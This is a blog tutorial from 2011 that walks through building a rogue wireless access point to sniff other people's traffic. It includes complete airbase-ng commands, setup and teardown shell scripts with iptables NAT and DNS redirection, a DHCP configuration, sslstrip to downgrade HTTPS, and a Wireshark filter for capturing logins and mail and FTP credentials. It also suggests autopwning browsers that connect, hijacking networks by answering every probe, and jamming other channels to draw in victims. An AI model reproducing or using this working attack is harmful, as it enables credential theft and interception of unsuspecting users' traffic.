Monday, October 10, 2011

Passive Wireless Sniffing Attack

So first off, sorry for the down time, I've been moving around a lot, trying a lot of things. I really like doing this so I thought bringing a quality tutorial to the blog might help a little.

The purpose of this tutorial is to teach you how to to make a wireless access point solely for the purpose of sniffing. It's great for networks where you can't perform ARP spoofing, and wireless is in the mix. There are a lot of possibilities for this attack but, I am only going to cover the basics.

First though, props to qnix over at 0x80, he wrote the blog post that helped inspire this one.

Let's get started >:D

So we begin with a simple plan. Create a wireless access point that bridges our ethernet port with our wireless card. (Just for your sanity: I have tried doing the wlan -> wlan bridging and it ended up with A LOT of headaches. From suddenly the AP having a hidden SSID, a setting I turned off, to DNS issues I felt it best to go through eth0) We need to do a couple of basic things:
  • Create a soft AP
  • Assign IP addresses
  • Sniff the traffic
  • Filter out things that may hinder our sniffing (SSL)
  • Bridge the two adapters
  • Put it all into script form so we can access it whenever
We've got some work to do as most of these are easier said than done.

THE TOOLS:
  • Software
    • The aircrack-ng suite
    • sslstrip
    • dhcp3d
  • Hardware
    • Computer (No fucking duh)
    • Wireless card (Preferably the extremely sexy Alfa AWUS036H)
  • Knowledge
    • DHCP 
    • DNS
    • Linux network interfaces
OK now let's actually get started.

Airbase-ng:
First, we need to start airbase-ng. We turn our cards to monitor mode,
airmon-ng start [if]
Then we just start airbase-ng
airbase-ng -e "[name of network]" -c [channel] [if (Most likely mon0)]
Now we are off to the painful part.

Scripting it up:
setup.sh [if] [gateway] (If you have to edit evil.conf, edit this too.)
#! /bin/bash
ifconfig at0 up
ifconfig $1 up
ifconfig at0 192.168.3.1 netmask 255.255.255.0
route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface $1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $2

#brctl addbr mitm
#brctl addif mitm $1
#brctl addif mitm at0
#ifconfig mitm up

cp evil.conf /etc/dhcp3/evil.conf
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/
dhcpd3 -d -f -cf /etc/dhcp3/evil.conf at0
destroy.sh [if]
#! /bin/bash
ifconfig at0 down
ifconfig $1 down
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 0 > /proc/sys/net/ipv4/ip_forward

killall -9 dhcpd3

ifconfig $1 up

ifdown $1
ifup $1
evil.conf (You will probably need to edit this)
option domain-name-servers 192.168.1.1;
default-lease-time 600;
max-lease-time 720;

ddns-update-style none;
authoritative;
log-facility local7;

subnet 192.168.3.0 netmask 255.255.255.0 {
range 192.168.3.100 192.168.3.254;
option routers 192.168.3.1;
option ip-forwarding on;
option domain-name-servers 192.168.1.1;
}

Hefty, let's explain what's going on here.

So first up we got setup.sh. This does a whole host of things, mainly sets up the DHCP stuff, let's chug through it piece by piece.

The first part,
ifconfig at0 up
ifconfig $1 up
turns on at0, the sniffing interface that airbase-ng creates.  Then ensures that the interface that is going to be bridged is up.

Let's get more gory.
ifconfig at0 192.168.3.1 netmask 255.255.255.0
route add -net 192.168.3.0 netmask 255.255.255.0 gw 192.168.3.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface $1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to $2
Happy, right? This sets up most of the IP routing tables and the other painful stuff. this might need more tweaking if you have a different network set up, however, it should work for most people. I'm not going to get to far into this as it's pretty self explanatory for anyone who has had to deal with iptables before.

#brctl addbr mitm
#brctl addif mitm $1
#brctl addif mitm at0
#ifconfig mitm up
This section is commented out but, I left it there for a specific purpose. It is supposed to be easier to use brctl (Bridge Control) to bridge the adapters but, it acts weird and I couldn't get DNS updates. I'll give a nickel to anyone who can make this work :3.

cp evil.conf /etc/dhcp3/evil.conf
mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/
dhcpd3 -d -f -cf /etc/dhcp3/evil.conf at0
This sets up our dhcp server.  Basically, it just copies our evil.conf file into the dhcp3 folder, does some directory making / owning and then starts DHCP on at0 using that conf file. 

Next we have destroy.sh which will just fix the changes and remove the bridge. It also will kill DHCP.

Lastly we may need to edit the evil.conf file. The only lines you should need to edit is the top one,
option domain-name-servers 192.168.1.1;
and this section
subnet 192.168.3.0 netmask 255.255.255.0 {
range 192.168.3.100 192.168.3.254;
option routers 192.168.3.1;
option ip-forwarding on;
option domain-name-servers 192.168.1.1;
}
Usually you will just edit for subnets (EX changing the subnet from 192.168.3.0 to 192.168.6.0) However if you do, be sure to change the corresponding values in setup.sh

Putting It All Together:
Next we just run the scripts, make sure that airbase-ng is up so that way at0 is present or else this will just error out.

Just run:
./setup.sh [if] [gateway]
This will keep dhcp in verbose mode and lets you know when new people connect. You may want to run sslstrip next. This strips ssl elements out of a page so it forces and unencrypted connection.
./sslstrip.py -k -a -f
Lastly just run wireshark on at0, with this display filter:
http.request.method == POST || http.request.method == GET || http.request.uri contains login || pop.request.command || imap.response == 1|| ftp.request.command
There are a couple extra things you can do after this.

For starts you can do what is suggested in the article on 0x80 and run an exploit server autopwning any browser that connects. However, the drawback to this is that Windows will notify you of a limited connection and that might make people switch networks as they can't access the internet.

The other one I thought of was to use:
airbase-ng -P mon0
This responds to all probes even if they specify an ESSID, this will let you hijack others networks as long as you have a better signal strength. However the drawback is that most people WILL have a better connection strength with their original router.

The best one I could think of was to use wifijammer to block all signals on all channels except yours (use a non-used channel like 4 or whatever). This will make people want to connect to you as everyone else's connection doesn't work. There are still drawbacks, like, will they actually know HOW to connect to a new wifi network. Some people are just that special.

Either way hope this helps, a good section was taken from 0x80, most of the credit goes to him and the community.

No comments:

Post a Comment